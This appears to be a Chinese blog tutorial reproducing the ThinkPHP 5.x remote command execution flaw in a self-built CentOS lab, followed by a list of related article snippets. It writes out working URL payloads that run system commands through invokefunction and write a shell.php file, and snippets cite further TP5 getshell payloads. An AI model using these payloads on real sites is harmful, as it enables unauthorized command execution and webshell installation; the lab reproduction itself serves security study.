html中执行写%3cphp%3e,thinkphp5.x命令执行漏洞复现及环境搭建

最新推荐文章于 2021-11-03 02:06:48 发布
VIP文章 最新推荐文章于 2021-11-03 02:06:48 发布
阅读量618 收藏
点赞数
文章标签: html中执行写%3cphp%3e

楼主Linux环境是Centos7,LAMP怎么搭不用我废话吧,别看错了

一.thinkphp5.X系列

1.安装composer

yum -y install composer

b8a346fbb6d99327fb61263931086ed0.png

安装php拓展

yum -y install php-mysql php-gd libjpeg* php-ldap php-odbc php-pear php-xml php-xmlrpc php-mbstring php-bcmath php-mhash -y

2.切换目录到/var/www/html

cd /var/www/html

安装thinkphp5

博主把含有命令执行漏洞的thinkphp源码链接附上

把文件解压到当前目录(/var/www/html)即可

ec7ecb5a18050a48b42164e13058ebc8.png

3.浏览器查看是否安装成功

921e4b72aba10c80f098df143f4e6148.png

到这里环境就搭建好了(各位看官如果照着前面的步骤没有成功的,麻烦把php运行环境搭建起来)

4.参考官方poc直接执行payload

#payload

http://192.168.2.134/tp5/public/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

/thinkphp/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

/thinkphp/public/?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=1

/thinkphp/public/?s=index/\think\app/invokefunction&function=system&vars=dir

/thinkphp/public/?s=index/\think\app/invokefunction&function=system&return_value=&command=dir

/thinkphp/public/?s=index/\think\app/invokefunction&function=system&vars[0]=dir&vars[1][]=

/thinkphp/public/index.php?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>

01204d4261fcb438bfb46c32b4b342bf.png

可以看到,这里权限是Apache

6af5b4be9b561535dc36016c61b4ddd7.png

这里说下,头一天强网杯web有一题就是thinkphp5.x的命令执行漏洞,叫做强网先锋上单。。。

当时觉得还好,随便拉的几个队友,有人做出来了&#

最低0.47元/天 解锁文章
一人谈视频
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Cphp-开源
05-01
php名称空间的类集,用于有用和广泛使用的任务,但是,每当一个新项目开始时它们都需要花费时间,这些类具有动态工作的功能,以提供更大的便利性和速度。
php设置请求头部,php使用header函数设置各种HTTP头的例子
weixin_35633340的博客
03-09 446
复制代码 代码如下:/**desc:header函数设置各种HTTP头link:www.jquerycn.cndate:2013/2/24*///定义编码header( 'Content-Type:text/html;charset=utf-8 ');//Atomheader('Content-type: application/atom+xml');//CSSheader('Content-ty...
php 如何过滤字符%3c %3e,php过滤字符串的标点符号
weixin_39957835的博客
03-18 567
functionfilter_mark($text){if(trim($text)=='')return'';$text=preg_replace("/[[:punct:]s]/",'',$text);$text=urlencode($text);$text=preg_replace("/(%7E|%60|%21|%40|%23|%24|%25|%5E|%26|%27|%2A|%28|%29...
html option怎么显示%3c符号,跟bWAPP学WEB安全(PHP代码)--XSS跨站脚本攻击
weixin_32819265的博客
06-20 121
背景这个系列有很多题,但是其实考察的相近,类似的就不在多说,我们来看吧。主要分几个点来讲:反射型存储型JSONXM头部字段相关分类介绍反射型存储型一般在博客留言板、评论、个人信息维护等地方容易存在,就是用户构造XSS的Payload保存在数据库,一旦用户访问该页面,则招。JSON型没有什么太大的不同,注意构造一下Payload,闭合标签即可,Payload:"alert(1)XML型在XML解...
php %3ca%3e链接到模板,html/template(模板)
weixin_32942557的博客
03-30 485
import "html/template"概述索引示例概观模板包(html/template)实现了数据驱动的模板,以便在代码注入过程安全地生成HTML输出。它提供了与包文本/模板相同的接口,只要输出是HTML,就应该使用它来代替文本/模板。这里的文档侧重于包的安全特性。有关如何自行编模板的信息,请参阅文本/模板的文档。介绍该软件包包装文本/模板,以便您可以共享其模板API以安全地解析和执行...
html%3c php被注释了,PHP代码显示为HTML注释,而不是被执行
weixin_39857480的博客
03-12 289
问:我正在使用Workspaces的Twig模板语言。自从我开始使用Twig以来,服务器已经停止执行文档包含的其他PHP代码。相反,它显示为HTML注释(在开发工具可见)。除此之外,Slim路由和Twig模板功能似乎运行良好。我试图重新制作文件无济于事。关于为什么发生这种情况以及如何解决的任何想法?答:我怀疑您不能在模板使用常规php,因为现在树枝已经解析了它,而不是php。我的猜测是,当...
[代码审计]ThinkPHP5的文件包含漏洞
Huamang的博客
11-03 1050
漏洞影响范围 加载模版解析变量时存在变量覆盖问题,导致文件包含漏洞的产生 漏洞影响版本:5.0.0<=ThinkPHP5<=5.0.18 、5.1.0<=ThinkPHP<=5.1.10 tp框架搭建 tp框架由两部分组成 应用项目: https://github.com/top-think/think 核心框架: https://github.com/top-think/framework 框架下载好后,需要更名为thinkphp 访问localhost/tp5.0.1/publi
ThinkPHP5 远程代码执行漏洞分析
repoman的博客
03-16 7625
前言 消息刚刚曝出来的时候还以为自己能半天把漏洞给找出来,果然是太菜太年轻了,23333 漏洞分析 漏洞点 此次漏洞出现在ThinkPHP用于处理HTTP请求的Request类,其的method方法用于获取当前的请求类型。 thinkphp/library/think/Request.php var_method为“表单伪装变量”,可在application/config.ph...
【网络安全】一次实战对tp5网站getshell方式的测试
HBohan的博客
10-27 1834
前言 之前接触tp5的站比较少,只知道利用RCE漏洞getshell的方式。在最近对一个发卡平台渗透的过程,由于php版本限制,无法直接使用RCE的payload拿shell,于是结合该网站尽可能多的测试一下tp5+php7.1环境下的getshell方法。 【查看资料】 正文 拿到站点后,访问首页如下 不过看不出来具体版本,不确定是否存在RCE,于是用exp打一下试试 _method=__construct&method=get&filter=call_user_func&ge
2 690.00 php,记一次有趣的tp5代码执行
weixin_42317885的博客
04-01 428
0x00 前言朋友之前给了个站,拿了很久终于拿下,简单记录一下。0x01 基础信息漏洞点:tp 5 method 代码执行,payload如下 POST /?s=captcha_method=__construct&method=get&filter[]=assert&server[]=1&get[]=1无回显,根据payload 成功判断目标thinkphp 版本...
前台隐藏不必要的栏目插件 for PHP168.rar
07-14
插件简介:此功能是把前台会员没有发布权限的栏目隐藏了,...建议member\post.php,admin\sort.php 两个文件的 ])>100||$fid )不要更改,或者不要设置超200,官方设置的100有其道理,否则后台和前台打开速度会很慢。  
W3SCHOOL PHP离线教程
08-28
W3SCHOOL PHP离线教程,可以快速的对PHP的语法有个简单的认识,也可作为参考工具开发时使用
noteBook::red_apple:笔记本
01-30
我的苹果笔记本 零,序言 平时积累的东西以笔记的形式分享出来 用法 目录结构 - js - public js示例 - main.js es6入口 - src webpack示例 - server.js webpack入口 - webpack.... - package.json 依赖管理 ...
Elasticsearch初识与简单案例.pdf
04-29
Elasticsearch是一个基于Lucene的分布式全文搜索引擎,提供灵活且高效的搜索和分析功能。通过HTTP请求和客户端库,用户可以索引和搜索文档,执行复杂查询,进行数据分析,并享受高亮显示等特性。其高级功能如复合查询、聚合分析、滚动搜索等,使其适用于各种数据处理和分析场景。Elasticsearch还具有强大的监控和日志功能,确保集群稳定运行。总之,Elasticsearch是企业级搜索和分析的理想选择。
Python基于LSTM模型对全国的空气质量数据进行可视化分析预测源代码
最新发布
04-29
介绍 对全国2019年1月至2023年12月的空气质量数据进行分析,绘制时间序列图,展示每月/每季度的平均AQI变化趋势。绘制不同省份和城市的平均AQI热力图。分析不同污染物的浓度分布和趋势。绘制空气质量等级分布图。 需求说明 对空气质量数据进行数据分析,并使用LSTM模型进行预测。 安装教程 pip install jupyter pip install numpy pandas matplotlib seaborn 使用说明 在项目路径下打开终端输入jupyter notebook就行
百问网linux桌面GUI,基于LVGL 8.x。.zip
04-29
百问网linux桌面GUI,基于LVGL 8.x。
基于Vue开发的XMall商城前台页面 PC端.zip
04-29
基于Vue开发的XMall商城前台页面 PC端.zip
2019年国民航大学电子设计竞赛E题-自动导航运输车
04-29
2019年国民航大学电子设计竞赛E题-自动导航运输车 全国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的同学可以用来学习提升和参考
精灵宝可梦go游戏UI界面设计PSD源文件.zip
04-29
游戏开发资源,游戏UI,游戏GUI,游戏图标,PSD格式,XD格式,PNG下载,源文件,可编辑下载,游戏购物充值界面,宝石,图标,PS格式,AI格式等,游戏APP
线索二叉树的实现.doc
04-29
(1)逻辑设计:出抽象数据类型的定义,各个主要模块的算法,并画出模块之间的调用关系图; (2)详细设计:定义相应的存储结构并出各函数的伪码算法。 (3)程序编码:把详细设计的结果进二步求精为程序设计语言程序。 (4)程序调试与测试:采用自底向上,分模块进行,即先调试低层函数。 (5)结果分析:程序运行结果包括正确的输入及其输出结果和含有错误的输入及其输出结果。算法的时间、空间复杂性分析; 效果表现为用户输入一串字符表示的先序序列,程序能够根据这个序列正确地建立二叉树,并通过序线索化非递归遍历结果。这有助于验证二叉树结构和遍历算法的正确性,同时对于理解和操作二叉树数据结构非常有帮助。 程序的输出结果证明了其对二叉树操作的正确性和有效性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值